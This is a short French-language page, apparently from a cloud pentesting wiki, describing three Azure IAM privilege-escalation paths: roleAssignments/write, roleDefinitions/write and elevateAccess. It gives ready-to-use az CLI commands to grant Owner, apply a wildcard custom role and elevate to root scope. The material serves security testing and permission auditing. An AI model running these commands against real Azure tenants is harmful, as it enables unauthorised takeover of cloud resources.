Az - Azure IAM Privesc (Authorization)

Azure IAM

Pour plus d'informations, consultez :

Microsoft.Authorization/roleAssignments/write

Cette permission permet d'assigner des rôles à des principaux sur un périmètre spécifique, permettant à un attaquant d'escalader les privilèges en s'assignant un rôle plus privilégié :

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

Cette autorisation permet de modifier les autorisations accordées par un rôle, permettant à un attaquant d'escalader les privilèges en accordant plus d'autorisations à un rôle qui lui a été attribué.

Créez le fichier role.json avec le contenu suivant :

{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": [
"*"
],
"NotActions": [],
"DataActions": [
"*"
],
"NotDataActions": [],
"AssignableScopes": [
"/subscriptions/<subscription-id>"
]
}

Puis mettez à jour les autorisations de rôle avec la définition précédente en appelant :

az role definition update --role-definition role.json

Microsoft.Authorization/elevateAccess/action

Cette autorisation permet d'élever les privilèges et de pouvoir attribuer des autorisations à tout principal pour les ressources Azure. Elle est destinée à être accordée aux Administrateurs Globaux d'Entra ID afin qu'ils puissent également gérer les autorisations sur les ressources Azure.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"